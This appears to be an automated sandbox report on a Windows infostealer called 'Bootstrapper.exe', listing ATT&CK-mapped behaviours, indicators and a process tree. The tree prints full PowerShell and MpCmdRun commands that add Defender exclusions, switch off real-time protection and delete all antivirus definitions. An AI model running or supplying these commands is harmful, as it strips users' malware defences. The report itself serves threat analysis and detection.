414f73d079d5ca28d21a946fabbe458f9a044f77e4ed826dd610511cfe8117b5

Analysis

max time kernel
63s
max time network
65s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
05-01-2025 23:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Bootstrapper.exe
Size

9.9MB
MD5

356719a726715fd6bb5de4a5a4ab4cb1
SHA1

185a61cef6c264c4a55c2baf444929f3b8f80e34
SHA256

414f73d079d5ca28d21a946fabbe458f9a044f77e4ed826dd610511cfe8117b5
SHA512

412ec5ead037fffcb97a07f3569464e9f0f741c77244ba251dcf83d3e931a9babb91aaf6105a39870c00a5443dc0d789be81f7cc0af38d9336fa8c70f1b48dc1
SSDEEP

196608:BmhhOV5TYFc0X8IxY0W7yZS+urErvI9pWjg/Qc+4o673pNrabeSyzWtPMYnNcsE:o84vY0WuVurEUWjZZ4dDLIehzWtPTNzE

Score

10^/10

credential_access defense_evasion discovery evasion execution spyware stealer themida trojan upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
5364	MpCmdRun.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Solara.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2792	powershell.exe
896	powershell.exe
2924	powershell.exe
4668	powershell.exe
6016	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Solara.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Solara.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3226857575-536881564-1522996248-1000\Control Panel\International\Geo\Nation	bound.exe

Executes dropped EXE 3 IoCs

pid	Process
3016	bound.exe
2720	rar.exe
472	Solara.exe

Loads dropped DLL 19 IoCs

pid	Process
4848	Bootstrapper.exe
4848	Bootstrapper.exe
4848	Bootstrapper.exe
4848	Bootstrapper.exe
4848	Bootstrapper.exe
4848	Bootstrapper.exe
4848	Bootstrapper.exe
4848	Bootstrapper.exe
4848	Bootstrapper.exe
4848	Bootstrapper.exe
4848	Bootstrapper.exe
4848	Bootstrapper.exe
4848	Bootstrapper.exe
4848	Bootstrapper.exe
4848	Bootstrapper.exe
4848	Bootstrapper.exe
4848	Bootstrapper.exe
472	Solara.exe
472	Solara.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/472-803-0x0000000180000000-0x0000000181107000-memory.dmp	themida
behavioral1/memory/472-805-0x0000000180000000-0x0000000181107000-memory.dmp	themida
behavioral1/memory/472-806-0x0000000180000000-0x0000000181107000-memory.dmp	themida
behavioral1/memory/472-804-0x0000000180000000-0x0000000181107000-memory.dmp	themida
behavioral1/memory/472-810-0x0000000180000000-0x0000000181107000-memory.dmp	themida
behavioral1/memory/472-811-0x0000000180000000-0x0000000181107000-memory.dmp	themida

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Solara.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
21	discord.com
22	discord.com
50	discord.com
51	discord.com
68	pastebin.com
69	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
48	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
4080	tasklist.exe
2736	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
472	Solara.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00280000000460e9-22.dat	upx
behavioral1/memory/4848-26-0x00007FFDC0CC0000-0x00007FFDC1385000-memory.dmp	upx
behavioral1/files/0x00280000000460db-28.dat	upx
behavioral1/memory/4848-33-0x00007FFDD9A30000-0x00007FFDD9A3F000-memory.dmp	upx
behavioral1/files/0x00280000000460e2-50.dat	upx
behavioral1/files/0x00760000000460e1-49.dat	upx
behavioral1/files/0x004f0000000460e0-48.dat	upx
behavioral1/files/0x00280000000460df-47.dat	upx
behavioral1/files/0x00280000000460de-46.dat	upx
behavioral1/files/0x00280000000460dd-45.dat	upx
behavioral1/files/0x00280000000460dc-44.dat	upx
behavioral1/files/0x00280000000460da-43.dat	upx
behavioral1/files/0x00280000000460ee-42.dat	upx
behavioral1/files/0x00280000000460ed-41.dat	upx
behavioral1/files/0x00280000000460ec-40.dat	upx
behavioral1/files/0x00280000000460e8-37.dat	upx
behavioral1/files/0x00280000000460e6-36.dat	upx
behavioral1/memory/4848-32-0x00007FFDD0810000-0x00007FFDD0835000-memory.dmp	upx
behavioral1/files/0x00280000000460e7-31.dat	upx
behavioral1/memory/4848-56-0x00007FFDCFA10000-0x00007FFDCFA3D000-memory.dmp	upx
behavioral1/memory/4848-58-0x00007FFDC7200000-0x00007FFDC721A000-memory.dmp	upx
behavioral1/memory/4848-60-0x00007FFDC71D0000-0x00007FFDC71F4000-memory.dmp	upx
behavioral1/memory/4848-62-0x00007FFDC0350000-0x00007FFDC04CF000-memory.dmp	upx
behavioral1/memory/4848-64-0x00007FFDCFAF0000-0x00007FFDCFB09000-memory.dmp	upx
behavioral1/memory/4848-66-0x00007FFDD0200000-0x00007FFDD020D000-memory.dmp	upx
behavioral1/memory/4848-68-0x00007FFDC6CC0000-0x00007FFDC6CF3000-memory.dmp	upx
behavioral1/memory/4848-74-0x00007FFDC0280000-0x00007FFDC034D000-memory.dmp	upx
behavioral1/memory/4848-76-0x00007FFDBFD50000-0x00007FFDC0279000-memory.dmp	upx
behavioral1/memory/4848-73-0x00007FFDD0810000-0x00007FFDD0835000-memory.dmp	upx
behavioral1/memory/4848-72-0x00007FFDC0CC0000-0x00007FFDC1385000-memory.dmp	upx
behavioral1/memory/4848-78-0x00007FFDC71B0000-0x00007FFDC71C4000-memory.dmp	upx
behavioral1/memory/4848-80-0x00007FFDCFD20000-0x00007FFDCFD2D000-memory.dmp	upx
behavioral1/memory/4848-86-0x00007FFDC71D0000-0x00007FFDC71F4000-memory.dmp	upx
behavioral1/memory/4848-87-0x00007FFDBFC30000-0x00007FFDBFD4A000-memory.dmp	upx
behavioral1/memory/4848-125-0x00007FFDC0350000-0x00007FFDC04CF000-memory.dmp	upx
behavioral1/memory/4848-181-0x00007FFDD0200000-0x00007FFDD020D000-memory.dmp	upx
behavioral1/memory/4848-213-0x00007FFDC6CC0000-0x00007FFDC6CF3000-memory.dmp	upx
behavioral1/memory/4848-303-0x00007FFDC0280000-0x00007FFDC034D000-memory.dmp	upx
behavioral1/memory/4848-306-0x00007FFDBFD50000-0x00007FFDC0279000-memory.dmp	upx
behavioral1/memory/4848-320-0x00007FFDC0350000-0x00007FFDC04CF000-memory.dmp	upx
behavioral1/memory/4848-315-0x00007FFDD0810000-0x00007FFDD0835000-memory.dmp	upx
behavioral1/memory/4848-314-0x00007FFDC0CC0000-0x00007FFDC1385000-memory.dmp	upx
behavioral1/memory/4848-327-0x00007FFDCFD20000-0x00007FFDCFD2D000-memory.dmp	upx
behavioral1/memory/4848-559-0x00007FFDC0CC0000-0x00007FFDC1385000-memory.dmp	upx
behavioral1/memory/4848-573-0x00007FFDBFC30000-0x00007FFDBFD4A000-memory.dmp	upx
behavioral1/memory/4848-584-0x00007FFDC6CC0000-0x00007FFDC6CF3000-memory.dmp	upx
behavioral1/memory/4848-583-0x00007FFDD0200000-0x00007FFDD020D000-memory.dmp	upx
behavioral1/memory/4848-582-0x00007FFDCFAF0000-0x00007FFDCFB09000-memory.dmp	upx
behavioral1/memory/4848-581-0x00007FFDC0350000-0x00007FFDC04CF000-memory.dmp	upx
behavioral1/memory/4848-580-0x00007FFDC71D0000-0x00007FFDC71F4000-memory.dmp	upx
behavioral1/memory/4848-579-0x00007FFDC7200000-0x00007FFDC721A000-memory.dmp	upx
behavioral1/memory/4848-578-0x00007FFDCFA10000-0x00007FFDCFA3D000-memory.dmp	upx
behavioral1/memory/4848-577-0x00007FFDD0810000-0x00007FFDD0835000-memory.dmp	upx
behavioral1/memory/4848-576-0x00007FFDD9A30000-0x00007FFDD9A3F000-memory.dmp	upx
behavioral1/memory/4848-572-0x00007FFDCFD20000-0x00007FFDCFD2D000-memory.dmp	upx
behavioral1/memory/4848-571-0x00007FFDC71B0000-0x00007FFDC71C4000-memory.dmp	upx
behavioral1/memory/4848-569-0x00007FFDC0280000-0x00007FFDC034D000-memory.dmp	upx
behavioral1/memory/4848-575-0x00007FFDBFD50000-0x00007FFDC0279000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\0445986d-c716-4d44-95bf-da245b23d276.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20250105233729.pma	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5208	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3226857575-536881564-1522996248-1000\{FDFC7D43-B5B5-43AE-8883-2474A8EE09BF}	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4668	powershell.exe
2792	powershell.exe
2792	powershell.exe
2792	powershell.exe
896	powershell.exe
896	powershell.exe
2924	powershell.exe
2924	powershell.exe
896	powershell.exe
4668	powershell.exe
4668	powershell.exe
2924	powershell.exe
4176	powershell.exe
4176	powershell.exe
4176	powershell.exe
2708	msedge.exe
2708	msedge.exe
3828	msedge.exe
3828	msedge.exe
4828	WMIC.exe
4828	WMIC.exe
4828	WMIC.exe
4828	WMIC.exe
2052	msedge.exe
2052	msedge.exe
5140	WMIC.exe
5140	WMIC.exe
5140	WMIC.exe
5140	WMIC.exe
5856	WMIC.exe
5856	WMIC.exe
5856	WMIC.exe
5856	WMIC.exe
6016	powershell.exe
6016	powershell.exe
6016	powershell.exe
5208	WMIC.exe
5208	WMIC.exe
5208	WMIC.exe
5208	WMIC.exe
5276	powershell.exe
5276	powershell.exe
5276	powershell.exe
5228	identity_helper.exe
5228	identity_helper.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe
472	Solara.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
3828	msedge.exe
3828	msedge.exe
3828	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4668	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	4080	tasklist.exe
Token: SeDebugPrivilege	2736	tasklist.exe
Token: SeDebugPrivilege	896	powershell.exe
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeIncreaseQuotaPrivilege	2792	powershell.exe
Token: SeSecurityPrivilege	2792	powershell.exe
Token: SeTakeOwnershipPrivilege	2792	powershell.exe
Token: SeLoadDriverPrivilege	2792	powershell.exe
Token: SeSystemProfilePrivilege	2792	powershell.exe
Token: SeSystemtimePrivilege	2792	powershell.exe
Token: SeProfSingleProcessPrivilege	2792	powershell.exe
Token: SeIncBasePriorityPrivilege	2792	powershell.exe
Token: SeCreatePagefilePrivilege	2792	powershell.exe
Token: SeBackupPrivilege	2792	powershell.exe
Token: SeRestorePrivilege	2792	powershell.exe
Token: SeShutdownPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeSystemEnvironmentPrivilege	2792	powershell.exe
Token: SeRemoteShutdownPrivilege	2792	powershell.exe
Token: SeUndockPrivilege	2792	powershell.exe
Token: SeManageVolumePrivilege	2792	powershell.exe
Token: 33	2792	powershell.exe
Token: 34	2792	powershell.exe
Token: 35	2792	powershell.exe
Token: 36	2792	powershell.exe
Token: SeDebugPrivilege	4176	powershell.exe
Token: SeIncreaseQuotaPrivilege	4668	powershell.exe
Token: SeSecurityPrivilege	4668	powershell.exe
Token: SeTakeOwnershipPrivilege	4668	powershell.exe
Token: SeLoadDriverPrivilege	4668	powershell.exe
Token: SeSystemProfilePrivilege	4668	powershell.exe
Token: SeSystemtimePrivilege	4668	powershell.exe
Token: SeProfSingleProcessPrivilege	4668	powershell.exe
Token: SeIncBasePriorityPrivilege	4668	powershell.exe
Token: SeCreatePagefilePrivilege	4668	powershell.exe
Token: SeBackupPrivilege	4668	powershell.exe
Token: SeRestorePrivilege	4668	powershell.exe
Token: SeShutdownPrivilege	4668	powershell.exe
Token: SeDebugPrivilege	4668	powershell.exe
Token: SeSystemEnvironmentPrivilege	4668	powershell.exe
Token: SeRemoteShutdownPrivilege	4668	powershell.exe
Token: SeUndockPrivilege	4668	powershell.exe
Token: SeManageVolumePrivilege	4668	powershell.exe
Token: 33	4668	powershell.exe
Token: 34	4668	powershell.exe
Token: 35	4668	powershell.exe
Token: 36	4668	powershell.exe
Token: SeIncreaseQuotaPrivilege	896	powershell.exe
Token: SeSecurityPrivilege	896	powershell.exe
Token: SeTakeOwnershipPrivilege	896	powershell.exe
Token: SeLoadDriverPrivilege	896	powershell.exe
Token: SeSystemProfilePrivilege	896	powershell.exe
Token: SeSystemtimePrivilege	896	powershell.exe
Token: SeProfSingleProcessPrivilege	896	powershell.exe
Token: SeIncBasePriorityPrivilege	896	powershell.exe
Token: SeCreatePagefilePrivilege	896	powershell.exe
Token: SeBackupPrivilege	896	powershell.exe
Token: SeRestorePrivilege	896	powershell.exe
Token: SeShutdownPrivilege	896	powershell.exe
Token: SeDebugPrivilege	896	powershell.exe
Token: SeSystemEnvironmentPrivilege	896	powershell.exe
Token: SeRemoteShutdownPrivilege	896	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3828	msedge.exe
3828	msedge.exe
3828	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2984 wrote to memory of 4848	2984	Bootstrapper.exe	84
PID 2984 wrote to memory of 4848	2984	Bootstrapper.exe	84
PID 4848 wrote to memory of 4600	4848	Bootstrapper.exe	86
PID 4848 wrote to memory of 4600	4848	Bootstrapper.exe	86
PID 4848 wrote to memory of 4632	4848	Bootstrapper.exe	87
PID 4848 wrote to memory of 4632	4848	Bootstrapper.exe	87
PID 4848 wrote to memory of 4192	4848	Bootstrapper.exe	90
PID 4848 wrote to memory of 4192	4848	Bootstrapper.exe	90
PID 4848 wrote to memory of 1020	4848	Bootstrapper.exe	91
PID 4848 wrote to memory of 1020	4848	Bootstrapper.exe	91
PID 4848 wrote to memory of 3300	4848	Bootstrapper.exe	93
PID 4848 wrote to memory of 3300	4848	Bootstrapper.exe	93
PID 4600 wrote to memory of 2792	4600	cmd.exe	97
PID 4600 wrote to memory of 2792	4600	cmd.exe	97
PID 4632 wrote to memory of 4668	4632	cmd.exe	96
PID 4632 wrote to memory of 4668	4632	cmd.exe	96
PID 4848 wrote to memory of 3024	4848	Bootstrapper.exe	98
PID 4848 wrote to memory of 3024	4848	Bootstrapper.exe	98
PID 4848 wrote to memory of 4024	4848	Bootstrapper.exe	99
PID 4848 wrote to memory of 4024	4848	Bootstrapper.exe	99
PID 3024 wrote to memory of 4080	3024	cmd.exe	102
PID 3024 wrote to memory of 4080	3024	cmd.exe	102
PID 4192 wrote to memory of 896	4192	cmd.exe	103
PID 4192 wrote to memory of 896	4192	cmd.exe	103
PID 3300 wrote to memory of 2924	3300	cmd.exe	104
PID 3300 wrote to memory of 2924	3300	cmd.exe	104
PID 4024 wrote to memory of 2736	4024	cmd.exe	105
PID 4024 wrote to memory of 2736	4024	cmd.exe	105
PID 1020 wrote to memory of 3016	1020	cmd.exe	106
PID 1020 wrote to memory of 3016	1020	cmd.exe	106
PID 4848 wrote to memory of 544	4848	Bootstrapper.exe	107
PID 4848 wrote to memory of 544	4848	Bootstrapper.exe	107
PID 544 wrote to memory of 4176	544	cmd.exe	110
PID 544 wrote to memory of 4176	544	cmd.exe	110
PID 4176 wrote to memory of 2444	4176	powershell.exe	112
PID 4176 wrote to memory of 2444	4176	powershell.exe	112
PID 3016 wrote to memory of 3828	3016	bound.exe	113
PID 3016 wrote to memory of 3828	3016	bound.exe	113
PID 2444 wrote to memory of 2144	2444	csc.exe	114
PID 2444 wrote to memory of 2144	2444	csc.exe	114
PID 3828 wrote to memory of 1324	3828	msedge.exe	115
PID 3828 wrote to memory of 1324	3828	msedge.exe	115
PID 4848 wrote to memory of 2840	4848	Bootstrapper.exe	116
PID 4848 wrote to memory of 2840	4848	Bootstrapper.exe	116
PID 2840 wrote to memory of 2720	2840	cmd.exe	118
PID 2840 wrote to memory of 2720	2840	cmd.exe	118
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119
PID 3828 wrote to memory of 1320	3828	msedge.exe	119

cURL User-Agent 6 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	77	curl/8.9.1-DEV
HTTP User-Agent header	78	curl/8.9.1-DEV
HTTP User-Agent header	82	curl/8.9.1-DEV
HTTP User-Agent header	83	curl/8.9.1-DEV
HTTP User-Agent header	84	curl/8.9.1-DEV
HTTP User-Agent header	73	curl/8.9.1-DEV

C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2984
- C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
  "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4632
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4668
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:5364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4192
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1020
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3016
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/w9yACJan55
        5⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:3828
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x120,0x130,0x7ffdb8e246f8,0x7ffdb8e24708,0x7ffdb8e24718
        6⤵
        
        PID:1324
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,3414773004062861613,10240989209683721916,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
        6⤵
        
        PID:1320
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,3414773004062861613,10240989209683721916,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2708
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,3414773004062861613,10240989209683721916,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
        6⤵
        
        PID:4376
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3414773004062861613,10240989209683721916,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
        6⤵
        
        PID:3068
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3414773004062861613,10240989209683721916,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
        6⤵
        
        PID:1532
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,3414773004062861613,10240989209683721916,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1
        6⤵
        
        PID:4404
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2208,3414773004062861613,10240989209683721916,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4944 /prefetch:8
        6⤵
        
        PID:2300
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2208,3414773004062861613,10240989209683721916,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4896 /prefetch:8
        6⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:2052
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,3414773004062861613,10240989209683721916,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6100 /prefetch:8
        6⤵
        
        PID:5548
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
        6⤵
        Drops file in Program Files directory
        
        PID:5564
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
